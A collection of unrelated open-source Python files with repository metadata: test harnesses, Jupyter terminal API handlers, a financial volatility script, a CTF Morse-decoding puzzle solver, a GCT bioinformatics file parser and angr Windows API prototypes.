if sys.version_info >= (3, 0):
# force string conversion for Python2 and Python3 compatibility
input_ = input_.encode()
out, stderr = p.communicate(input_)
if sys.version_info >= (3, 0):
# force string conversion for Python2 and Python3 compatibility
out = out.decode()
rc = p.returncode
if rc:
print(out)
print(stderr)
fail("CLI returned error code")
assert(out)
# print out
def parse_data(s, pattern):
# m = re.findall("{}.*\n(.*)\n(?={})".format(pattern, pattern), s)
        # Note how the second \n is optional (\n?), this is to accommodate
# commands with an empty output
m = re.findall("{}[^\n]*\n(.*?)\n?(?={})".format(pattern, pattern), s,
re.DOTALL)
return m
out_parsed = parse_data(out, "PI CLI> ")
with open(output_path, "r") as f:
        expected_parse = parse_data(f.read(), r"\?\?\?\?")
if len(out_parsed) != len(expected_parse):
print(out_parsed)
print("****************")
fail("Mismatch between expected output and actual output")
for o, e in zip(out_parsed, expected_parse):
if o != e:
print(o)
print("****************")
print(e)
fail("Mismatch between expected output and actual output")
# terminate gives the process a chance to flush to the file
rpc_server_p.terminate()
simple_switch_p.terminate()
    # apparently, there is no issue with reading from the PIPE after
    # terminating the process
if with_valgrind:
v1 = process_valgrind_output(io.BytesIO(stderr), "RPC CLI")
v2 = process_valgrind_output(rpc_server_p.stderr, "RPC server")
if (not v1) or (not v2):
fail_msg("Detected valgrind error(s)")
remove_rpc()
sys.exit(0)
if __name__ == '__main__':
main()
|
821325014006bb6fa140238819fb92fa7d7b674f
|
52245910f830dbfb2b1432ad2a967df7321ee6de
|
/panel/tests/ui/test_reactive.py
|
c0f4a79c4b23dbd536ebc46b656a12d4157e9e2e
|
[
"BSD-3-Clause"
] |
permissive
|
holoviz/panel
|
92c19f979353d456512abbce5a027dff6ddb3a5c
|
2c6e165e2bba96c0cb97947aa072d4429133cf7a
|
refs/heads/main
| 2023-08-17T11:28:06.581979
| 2023-08-17T11:23:09
| 2023-08-17T11:23:09
| 145,848,899
| 2,544
| 373
|
BSD-3-Clause
| 2023-09-14T17:13:31
| 2018-08-23T12:14:24
|
Python
|
UTF-8
|
Python
| false
| false
| 2,689
|
py
|
test_reactive.py
|
import time
import param
import pytest
try:
from playwright.sync_api import expect
pytestmark = pytest.mark.ui
except ImportError:
pytestmark = pytest.mark.skip('playwright not available')
from panel.io.server import serve
from panel.reactive import ReactiveHTML
class ReactiveComponent(ReactiveHTML):
count = param.Integer(default=0)
_template = """
<div id="reactive" class="reactive" onclick="${script('click')}"></div>
"""
_scripts = {
'render': 'data.count += 1; reactive.innerText = `${data.count}`;',
'click': 'data.count += 1; reactive.innerText = `${data.count}`;'
}
def test_reactive_html_click_js_event(page, port):
component = ReactiveComponent()
serve(component, port=port, threaded=True, show=False)
time.sleep(0.2)
page.goto(f"http://localhost:{port}")
expect(page.locator(".reactive")).to_have_text('1')
page.locator(".reactive").click()
expect(page.locator(".reactive")).to_have_text('2')
time.sleep(0.2)
assert component.count == 2
def test_reactive_html_set_loading_no_rerender(page, port):
component = ReactiveComponent()
serve(component, port=port, threaded=True, show=False)
time.sleep(0.2)
page.goto(f"http://localhost:{port}")
expect(page.locator(".reactive")).to_have_text('1')
component.loading = True
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
component.loading = False
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
def test_reactive_html_changing_css_classes_rerenders(page, port):
component = ReactiveComponent()
serve(component, port=port, threaded=True, show=False)
time.sleep(0.5)
page.goto(f"http://localhost:{port}")
expect(page.locator(".reactive")).to_have_text('1')
component.css_classes = ['custom']
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
component.loading = True
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
component.css_classes = []
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
def test_reactive_html_set_background_no_rerender(page, port):
component = ReactiveComponent()
serve(component, port=port, threaded=True, show=False)
time.sleep(0.2)
page.goto(f"http://localhost:{port}")
expect(page.locator(".reactive")).to_have_text('1')
component.styles = dict(background='red')
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
component.styles = dict(background='green')
time.sleep(0.1)
expect(page.locator(".reactive")).to_have_text('1')
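# Note (not part of the test module): in a ReactiveHTML template,
# ${script('click')} binds the inline DOM event to the _scripts entry named
# 'click', and `data` inside those scripts proxies the declared params; that is
# why clicking the div increments `count` on the Python side as asserted above.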
|
5a686aefb3989f5a26272f9fd654f0eec97aa563
|
93713f46f16f1e29b725f263da164fed24ebf8a8
|
/Library/lib/python3.7/site-packages/notebook/terminal/api_handlers.py
|
059cc9165710e576d14c3a41dc8e347f23f957b0
|
[
"BSD-3-Clause"
] |
permissive
|
holzschu/Carnets
|
b83d15136d25db640cea023abb5c280b26a9620e
|
1ad7ec05fb1e3676ac879585296c513c3ee50ef9
|
refs/heads/master
| 2023-02-20T12:05:14.980685
| 2023-02-13T15:59:23
| 2023-02-13T15:59:23
| 167,671,526
| 541
| 36
|
BSD-3-Clause
| 2022-11-29T03:08:22
| 2019-01-26T09:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,217
|
py
|
api_handlers.py
|
import json
from tornado import web, gen
from ..base.handlers import APIHandler
from ..utils import url_path_join
class TerminalRootHandler(APIHandler):
@web.authenticated
def get(self):
tm = self.terminal_manager
terms = [{'name': name} for name in tm.terminals]
self.finish(json.dumps(terms))
@web.authenticated
def post(self):
"""POST /terminals creates a new terminal and redirects to it"""
name, _ = self.terminal_manager.new_named_terminal()
self.finish(json.dumps({'name': name}))
class TerminalHandler(APIHandler):
SUPPORTED_METHODS = ('GET', 'DELETE')
@web.authenticated
def get(self, name):
tm = self.terminal_manager
if name in tm.terminals:
self.finish(json.dumps({'name': name}))
else:
raise web.HTTPError(404, "Terminal not found: %r" % name)
@web.authenticated
@gen.coroutine
def delete(self, name):
tm = self.terminal_manager
if name in tm.terminals:
yield tm.terminate(name, force=True)
self.set_status(204)
self.finish()
else:
raise web.HTTPError(404, "Terminal not found: %r" % name)
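# Usage sketch (not part of the module; the /api/terminals prefix and the token
# header are assumptions about how these handlers are mounted):
#
#     import requests
#     base = "http://localhost:8888/api/terminals"
#     headers = {"Authorization": "token <your-token>"}
#     requests.post(base, headers=headers).json()      # create -> {'name': '1'}
#     requests.get(base, headers=headers).json()       # list -> [{'name': '1'}]
#     requests.delete(base + "/1", headers=headers)    # terminate -> 204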
|
aabebadf8460aba72cb397fd8cb2bbe10e810389
|
3e8cf48007bbcb17be2f21bf3e1758953fff3123
|
/发布报告的策略/市场分析小工具/三个月波动率计算.py
|
ff314ce3c90a4d84e346157ae41473e5f8bcb314
|
[] |
no_license
|
08zhangyi/multi-factor-gm-wind-joinquant
|
e3b296340d3126f98662d9041d38724fca697ab4
|
c1d2b0cdfa2425bf3c8ac61548974d246687e450
|
refs/heads/master
| 2022-11-16T08:36:19.666321
| 2022-10-26T04:46:17
| 2022-10-26T04:46:17
| 138,122,559
| 179
| 97
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
三个月波动率计算.py
|
from WindPy import w
w.start()
CODE_LIST = ['510300.SH', '511380.SH']
START_DATE = '2022-02-13'
END_DATE = '2022-05-13'
data = w.wss(CODE_LIST, "stdevry",
"startDate="+START_DATE+";endDate="+END_DATE+";period=1;returnType=1").Data[0]
print(data)
print(data[0]/data[1])
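# Notes (not in the original script; the file name translates to "three-month
# volatility calculation"): w.wss is WindPy's cross-sectional data call, and
# "stdevry" appears to request each code's return volatility between START_DATE
# and END_DATE, so the last line prints the volatility ratio of 510300.SH to
# 511380.SH.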
|
70f8b8a244e97a275bf76c455a1be526087f1065
|
ed36064525bad62959d9ab739edeea477bf29c1c
|
/2016-04-15-plaid-ctf/misc_morset/doit.py
|
df586a3b36120197df31b438a175a1eb3ec0b997
|
[] |
no_license
|
p4-team/ctf
|
2dae496622c8403d7539b21f0e9a286e9889195a
|
8280caff137e42b26cb55f2c62411c7c512088de
|
refs/heads/master
| 2023-08-12T03:21:31.021612
| 2023-04-26T23:57:29
| 2023-04-26T23:57:29
| 42,933,477
| 1,899
| 366
| null | 2022-06-07T21:51:40
| 2015-09-22T12:53:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,874
|
py
|
doit.py
|
from pwn import *
import binascii
import hashlib
code = {'A': '.-', 'B': '-...', 'C': '-.-.',
'D': '-..', 'E': '.', 'F': '..-.',
'G': '--.', 'H': '....', 'I': '..',
'J': '.---', 'K': '-.-', 'L': '.-..',
'M': '--', 'N': '-.', 'O': '---',
'P': '.--.', 'Q': '--.-', 'R': '.-.',
'S': '...', 'T': '-', 'U': '..-',
'V': '...-', 'W': '.--', 'X': '-..-',
'Y': '-.--', 'Z': '--..',
'0': '-----', '1': '.----', '2': '..---',
'3': '...--', '4': '....-', '5': '.....',
'6': '-....', '7': '--...', '8': '---..',
'9': '----.'
}
revcode = {morse: letter for letter, morse in code.items()}
def morse_dec(msg):
    res = ""
    for word in msg.strip().split():
        res += revcode[word]
    return res
def morse_enc(msg):
    res = ""
    for c in msg:
        res += code[c.upper()] + " "
    return res.strip()
def decrypt(s):
    h = hex(int(morse_dec(s), 36))[2:].rstrip("L")  # rstrip("L") only matters for Python 2 longs
    if len(h) % 2 == 1:
        h = "0" + h
    return binascii.unhexlify(h)
def base36encode(number):
    if not isinstance(number, int):
        raise TypeError('number must be an integer')
    if number < 0:
        raise ValueError('number must be positive')
    alphabet, base36 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', ''
    while number:
        number, i = divmod(number, 36)
        base36 = alphabet[i] + base36
    return base36 or alphabet[0]
def encrypt(s):
    if isinstance(s, str):
        s = s.encode()  # binascii.hexlify needs bytes on Python 3
    return morse_enc(base36encode(int(binascii.hexlify(s), 16)))
r = remote("morset.pwning.xxx", 11821)
context.log_level = "DEBUG"
s = r.recvline().decode()
h = decrypt(s)
print(h)
h = h.split(b"SHA256")[1][1:].split(b")")[0]
print(h)
# r.sendline(morse_enc(hashlib.sha256(h).hexdigest()))
r.sendline(encrypt(hashlib.sha256(h).hexdigest()).encode())
s = r.recvline().decode()
print(decrypt(s))
r.recvall()
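# Round-trip sketch (not part of the original exploit): the channel encodes
# bytes -> base36 integer string -> Morse; e.g. b'hi' is 0x6869 = 26729, which
# is "KMH" in base36, i.e. "-.- -- ...." in Morse, and decrypt(encrypt('hi'))
# returns b'hi'.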
|
21a17564d2c433c1a90682d9dc6329df5c8a59a7
|
b319086bffb2af7144e404ce244a14d262d01e6a
|
/cmapPy/pandasGEXpress/parse_gct.py
|
8cfcd0925a8739c021416f4c18691fcf9986e802
|
[
"BSD-3-Clause"
] |
permissive
|
cmap/cmapPy
|
18e5c563e0ae0f161366d1f56be36ae6568b39d8
|
d1652c3223e49e68e3a71634909342b4a6dbf361
|
refs/heads/master
| 2022-07-22T20:44:02.189031
| 2022-07-19T18:55:29
| 2022-07-19T18:55:29
| 86,500,068
| 107
| 82
|
BSD-3-Clause
| 2022-07-19T18:55:30
| 2017-03-28T19:40:02
|
Python
|
UTF-8
|
Python
| false
| false
| 14,171
|
py
|
parse_gct.py
|
""" Reads in a gct file as a gctoo object.
The main method is parse. parse_into_3_df creates the row
metadata, column metadata, and data dataframes, while the
assemble_multi_index_df method in GCToo.py assembles them.
1) Example GCT v1.3:
----- start of file ------
#1.3
96 36 9 15
---------------------------------------------------
|id| rhd | cid |
---------------------------------------------------
| | | |
|c | | |
|h | (blank) | col_metadata |
|d | | |
| | | |
---------------------------------------------------
| | | |
|r | | |
|i | row_metadata | data |
|d | | |
| | | |
---------------------------------------------------
----- end of file ------
Notes:
- line 1 of file ("#1.3") refers to the version number
- line 2 of file ("96 36 9 15") refers to the following:
-96 = number of data rows
-36 = number of data columns
-9 = number of row metadata fields (+1 for the 'id' column -- first column)
-15 = number of col metadata fields (+1 for the 'id' row -- first row)
- Once read into a DataFrame, col_metadata_df is stored as the transpose of how it looks in the gct file.
That is, col_metadata_df.shape = (num_cid, num_chd).
2) Example GCT v1.2
----- start of file ------
#1.2
96 36
-----------------------------------------------
|"NAME" |"Description"| cid |
-----------------------------------------------
| r | | |
| i | | |
| d |row_metadata | data |
| | | |
| | | |
-----------------------------------------------
----- end of file ------
Notes:
    - line 1 of file ("#1.2") refers to the version number
    - line 2 of file ("96 36") refers to the following:
-96 = number of data rows
-36 = number of data columns
"""
import logging
import pandas as pd
import numpy as np
import os.path
import gzip
import cmapPy.pandasGEXpress.GCToo as GCToo
import cmapPy.pandasGEXpress.subset_gctoo as sg
import cmapPy.pandasGEXpress.setup_GCToo_logger as setup_logger
__author__ = "Lev Litichevskiy, Oana Enache"
__email__ = "lev@broadinstitute.org"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
# What to label the index and columns of the component dfs
row_index_name = "rid"
column_index_name = "cid"
row_header_name = "rhd"
column_header_name = "chd"
DEFAULT_DATA_TYPE = np.float32
def parse(file_path, convert_neg_666=True, rid=None, cid=None,
ridx=None, cidx=None, row_meta_only=False, col_meta_only=False, make_multiindex=False,
data_type=DEFAULT_DATA_TYPE):
"""
The main method.
Args:
- file_path (string): full path to gct(x) file you want to parse
- convert_neg_666 (bool): whether to convert -666 values to numpy.nan
      (see Note below for more details). Default = True.
- rid (list of strings): list of row ids to specifically keep from gct. Default=None.
- cid (list of strings): list of col ids to specifically keep from gct. Default=None.
- ridx (list of integers): only read the rows corresponding to this
list of integer ids. Default=None.
- cidx (list of integers): only read the columns corresponding to this
list of integer ids. Default=None.
- row_meta_only (bool): Whether to load data + metadata (if False), or
just row metadata (if True) as pandas DataFrame
- col_meta_only (bool): Whether to load data + metadata (if False), or
just col metadata (if True) as pandas DataFrame
- make_multiindex (bool): whether to create a multi-index df combining
the 3 component dfs
- data_type (numpy datatype): type of data to try to convert strings in matrix into,
i.e. default is numpy float32
Returns:
- myGCToo (GCToo object): A GCToo instance containing content of
parsed gct file ** OR **
- row_metadata (pandas df) ** OR ** col_metadata (pandas df)
Note: why is convert_neg_666 even a thing?
In CMap--for somewhat obscure historical reasons--we use "-666" as our null value
for metadata. However (so that users can take full advantage of pandas' methods,
including those for filtering nan's etc) we provide the option of converting these
into numpy.nan values, the pandas default.
"""
assert sum([row_meta_only, col_meta_only]) <= 1, (
"row_meta_only and col_meta_only cannot both be requested.")
    nan_values = [
        "#N/A", "N/A", "NA", "#NA", "NULL", "NaN", "-NaN",
        "nan", "-nan", "#N/A!", "na", "None", "#VALUE!"]
# Add "-666" to the list of NaN values
if convert_neg_666:
nan_values.append("-666")
# Verify that the gct path exists
if not os.path.exists(file_path):
err_msg = "The given path to the gct file cannot be found. gct_path: {}"
logger.error(err_msg.format(file_path))
raise Exception(err_msg.format(file_path))
logger.info("Reading GCT: {}".format(file_path))
# Read version and dimensions
(version, num_data_rows, num_data_cols,
num_row_metadata, num_col_metadata) = read_version_and_dims(file_path)
# Read in metadata and data
(row_metadata, col_metadata, data) = parse_into_3_df(
file_path, num_data_rows, num_data_cols,
num_row_metadata, num_col_metadata, nan_values, data_type)
# Create the gctoo object and assemble 3 component dataframes
# Not the most efficient if only metadata requested (i.e. creating the
# whole GCToo just to return the metadata df), but simplest
myGCToo = create_gctoo_obj(file_path, version, row_metadata, col_metadata,
data, make_multiindex)
# Subset if requested
if (rid is not None) or (ridx is not None) or (cid is not None) or (cidx is not None):
logger.info("Subsetting GCT... (note that there are no speed gains when subsetting GCTs)")
myGCToo = sg.subset_gctoo(myGCToo, rid=rid, cid=cid, ridx=ridx, cidx=cidx)
if row_meta_only:
return myGCToo.row_metadata_df
elif col_meta_only:
return myGCToo.col_metadata_df
else:
return myGCToo
def read_version_and_dims(file_path):
extension = os.path.splitext(file_path)[-1]
logger.debug("extension: {}".format(extension))
# Open file
f = open(file_path, "r") if ".gct" == extension else gzip.open(file_path, 'rt')
# Get version from the first line
version = f.readline().strip().lstrip("#")
if version not in ["1.3", "1.2"]:
err_msg = ("Only GCT1.2 and 1.3 are supported. The first row of the GCT " +
"file must simply be (without quotes) '#1.3' or '#1.2'")
logger.error(err_msg.format(version))
raise Exception(err_msg.format(version))
# Convert version to a string
version_as_string = "GCT" + str(version)
# Read dimensions from the second line
dims = f.readline().strip().split("\t")
# Close file
f.close()
# Check that the second row is what we expect
if version == "1.2" and len(dims) != 2:
error_msg = "GCT1.2 should have 2 dimension-related entries in row 2. dims: {}"
logger.error(error_msg.format(dims))
raise Exception(error_msg.format(dims))
elif version == "1.3" and len(dims) != 4:
error_msg = "GCT1.3 should have 4 dimension-related entries in row 2. dims: {}"
logger.error(error_msg.format(dims))
raise Exception(error_msg.format(dims))
# Explicitly define each dimension
num_data_rows = int(dims[0])
num_data_cols = int(dims[1])
if len(dims) == 4:
num_row_metadata = int(dims[2])
num_col_metadata = int(dims[3])
else:
num_row_metadata = 1
num_col_metadata = 0
# Return version and dimensions
return version_as_string, num_data_rows, num_data_cols, num_row_metadata, num_col_metadata
def parse_into_3_df(file_path, num_data_rows, num_data_cols, num_row_metadata, num_col_metadata, nan_values, data_type=DEFAULT_DATA_TYPE):
# Read the gct file beginning with line 3
full_df = pd.read_csv(file_path, sep="\t", header=None, skiprows=2,
dtype=str, na_values=nan_values, keep_default_na=False)
# Check that full_df is the size we expect
expected_row_num = num_col_metadata + num_data_rows + 1
expected_col_num = num_row_metadata + num_data_cols + 1
assert full_df.shape == (expected_row_num,
expected_col_num), (
("The shape of full_df is not as expected: expected shape is {} x {} " +
"parsed shape is {} x {}").format(expected_row_num, expected_col_num,
full_df.shape[0], full_df.shape[1]))
# Assemble metadata dataframes
row_metadata = assemble_row_metadata(full_df, num_col_metadata, num_data_rows, num_row_metadata)
col_metadata = assemble_col_metadata(full_df, num_col_metadata, num_row_metadata, num_data_cols)
# Assemble data dataframe
data = assemble_data(full_df, num_col_metadata, num_data_rows, num_row_metadata, num_data_cols, data_type)
# Return 3 dataframes
return row_metadata, col_metadata, data
def assemble_row_metadata(full_df, num_col_metadata, num_data_rows, num_row_metadata):
# Extract values
row_metadata_row_inds = range(num_col_metadata + 1, num_col_metadata + num_data_rows + 1)
row_metadata_col_inds = range(1, num_row_metadata + 1)
row_metadata = full_df.iloc[row_metadata_row_inds, row_metadata_col_inds]
# Create index from the first column of full_df (after the filler block)
row_metadata.index = full_df.iloc[row_metadata_row_inds, 0]
# Create columns from the top row of full_df (before cids start)
row_metadata.columns = full_df.iloc[0, row_metadata_col_inds]
# Rename the index name and columns name
row_metadata.index.name = row_index_name
row_metadata.columns.name = row_header_name
# Convert metadata to numeric if possible
row_metadata = row_metadata.apply(lambda x: pd.to_numeric(x, errors="ignore"))
return row_metadata
def assemble_col_metadata(full_df, num_col_metadata, num_row_metadata, num_data_cols):
# Extract values
col_metadata_row_inds = range(1, num_col_metadata + 1)
col_metadata_col_inds = range(num_row_metadata + 1, num_row_metadata + num_data_cols + 1)
col_metadata = full_df.iloc[col_metadata_row_inds, col_metadata_col_inds]
# Transpose so that samples are the rows and headers are the columns
col_metadata = col_metadata.T
# Create index from the top row of full_df (after the filler block)
col_metadata.index = full_df.iloc[0, col_metadata_col_inds]
# Create columns from the first column of full_df (before rids start)
col_metadata.columns = full_df.iloc[col_metadata_row_inds, 0]
# Rename the index name and columns name
col_metadata.index.name = column_index_name
col_metadata.columns.name = column_header_name
# Convert metadata to numeric if possible
col_metadata = col_metadata.apply(lambda x: pd.to_numeric(x, errors="ignore"))
return col_metadata
def assemble_data(full_df, num_col_metadata, num_data_rows, num_row_metadata, num_data_cols, data_type=DEFAULT_DATA_TYPE):
# Extract values
data_row_inds = range(num_col_metadata + 1, num_col_metadata + num_data_rows + 1)
data_col_inds = range(num_row_metadata + 1, num_row_metadata + num_data_cols + 1)
data = full_df.iloc[data_row_inds, data_col_inds]
# Create index from the first column of full_df (after the filler block)
data.index = full_df.iloc[data_row_inds, 0]
# Create columns from the top row of full_df (after the filler block)
data.columns = full_df.iloc[0, data_col_inds]
# Convert from str to float
    try:
        data = data.astype(data_type)
    except (ValueError, TypeError):
        # If that fails, report the first value that could not be converted
        for col in data:
            try:
                data[col].astype(data_type)
            except (ValueError, TypeError):
                for row_idx, val in enumerate(data[col]):
                    try:
                        data_type(val)
                    except (ValueError, TypeError):
bad_row_label = data[col].index[row_idx]
err_msg = ("First instance of value that could not be converted: " +
"data.loc['{}', '{}'] = '{}'\nAdd to nan_values if you wish " +
"for this value to be considered NaN.").format(bad_row_label, col, val)
logger.error(err_msg)
raise Exception(err_msg)
# Rename the index name and columns name
data.index.name = row_index_name
data.columns.name = column_index_name
return data
def create_gctoo_obj(file_path, version, row_metadata_df, col_metadata_df, data_df, make_multiindex):
# Move dataframes into GCToo object
gctoo_obj = GCToo.GCToo(src=file_path,
version=version,
row_metadata_df=row_metadata_df,
col_metadata_df=col_metadata_df,
data_df=data_df, make_multiindex=make_multiindex)
return gctoo_obj
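# Usage sketch (not part of the module; the file path is hypothetical):
#
#     import cmapPy.pandasGEXpress.parse_gct as pg
#     gctoo = pg.parse("example_n36x96.gct")                       # full GCToo
#     row_meta = pg.parse("example_n36x96.gct", row_meta_only=True)
#     first_cols = pg.parse("example_n36x96.gct", cidx=[0, 1, 2])  # subset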
|
72995e6261824890f0c13cee96f06a26ff14536e
|
f3806d9fb54773908cd9704121a543b114470aca
|
/angr/procedures/definitions/win32_t2embed.py
|
1a7c2e02028d8840ebeab7ee3a29de2e0608d340
|
[
"BSD-2-Clause"
] |
permissive
|
angr/angr
|
8ae95fceca51b0a001de56477d984dd01193ac1d
|
37e8ca1c3308ec601ad1d7c6bc8081ff38a7cffd
|
refs/heads/master
| 2023-08-17T03:15:21.007865
| 2023-08-15T18:44:57
| 2023-08-15T18:44:57
| 40,328,394
| 7,184
| 1,306
|
BSD-2-Clause
| 2023-09-14T20:14:23
| 2015-08-06T21:46:55
|
Python
|
UTF-8
|
Python
| false
| false
| 11,514
|
py
|
win32_t2embed.py
|
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("t2embed.dll")
prototypes = \
{
#
'TTEmbedFont': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="TTEMBED_FLAGS"), SimTypeInt(signed=False, label="EMBED_FONT_CHARSET"), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeShort(signed=False, label="UInt16"), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRootStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRootStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTEMBEDINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "ulFlags", "ulCharSet", "pulPrivStatus", "pulStatus", "lpfnWriteToStream", "lpvWriteStream", "pusCharCodeSet", "usCharCodeCount", "usLanguage", "pTTEmbedInfo"]),
#
'TTEmbedFontFromFileA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeInt(signed=False, label="TTEMBED_FLAGS"), SimTypeInt(signed=False, label="EMBED_FONT_CHARSET"), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeShort(signed=False, label="UInt16"), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRootStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRootStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTEMBEDINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "szFontFileName", "usTTCIndex", "ulFlags", "ulCharSet", "pulPrivStatus", "pulStatus", "lpfnWriteToStream", "lpvWriteStream", "pusCharCodeSet", "usCharCodeCount", "usLanguage", "pTTEmbedInfo"]),
#
'TTLoadEmbeddedFont': SimTypeFunction([SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0), SimTypeInt(signed=False, label="FONT_LICENSE_PRIVS"), SimTypePointer(SimTypeInt(signed=False, label="TTLOAD_EMBEDDED_FONT_STATUS"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRefStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRefStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTLOADINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["phFontReference", "ulFlags", "pulPrivStatus", "ulPrivs", "pulStatus", "lpfnReadFromStream", "lpvReadStream", "szWinFamilyName", "szMacFamilyName", "pTTLoadInfo"]),
#
'TTGetEmbeddedFontInfo': SimTypeFunction([SimTypeInt(signed=False, label="TTEMBED_FLAGS"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="FONT_LICENSE_PRIVS"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRefStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRefStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTLOADINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ulFlags", "pulPrivStatus", "ulPrivs", "pulStatus", "lpfnReadFromStream", "lpvReadStream", "pTTLoadInfo"]),
#
'TTDeleteEmbeddedFont': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hFontReference", "ulFlags", "pulStatus"]),
#
'TTGetEmbeddingType': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pulEmbedType"]),
#
'TTCharToUnicode': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pucCharCodes", "ulCharCodeSize", "pusShortCodes", "ulShortCodeSize", "ulFlags"]),
#
